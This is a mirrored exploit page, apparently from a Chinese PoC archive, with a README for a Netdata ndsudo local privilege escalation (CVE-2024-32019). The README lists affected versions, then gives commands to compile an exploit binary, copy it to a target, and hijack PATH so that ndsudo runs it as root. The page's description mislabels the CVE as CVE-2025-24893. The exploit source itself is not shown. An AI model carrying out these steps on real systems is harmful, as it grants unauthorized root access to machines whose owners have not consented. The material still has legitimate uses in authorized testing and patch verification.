关联漏洞
描述
this is a poc for the CVE-2025-24893
介绍
# ⚠️ CVE-2024-32019 - PoC
## 📌 Affected Versions
- `>= v1.45.0`, `< v1.45.3`
- `>= v1.44.0-60`, `< v1.45.0-169`
---
## 🛠️ Proof of Concept
**CVE-2024-32019** — `ndsudo` local privilege escalation via **untrusted search path**.
### 🔧 Compile the Exploit
```bash
x86_64-linux-gnu-gcc -o nvme exploit.c -static
```
### 📤 Deploy on Target Machine
1. **Transfer the compiled binary** to the vulnerable machine.
2. Make it executable:
```bash
chmod +x nvme
```
3. Exploit the vulnerable binary via `PATH` manipulation (use the same path where you uploaded your binary):
```bash
PATH=$(pwd):$PATH /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
```
---
## 🔍 Reference
- [Netdata Security Advisory - GHSA-pmhq-4cxq-wj93](https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93)
---
## ⚖️ Disclaimer and Terms
This Proof of Concept (PoC) code is provided for **educational and authorized penetration testing purposes only**.
- **No permission** is granted to modify, redistribute, or use this code for any other purposes.
- Unauthorized use or modification may be **illegal and unethical**.
- The authors take **no responsibility** for any misuse or damages.
文件快照
[4.0K] /data/pocs/5d75bd086b37147f80fd4161b39c948b116317f7
├── [ 239] exploit.c
└── [1.2K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。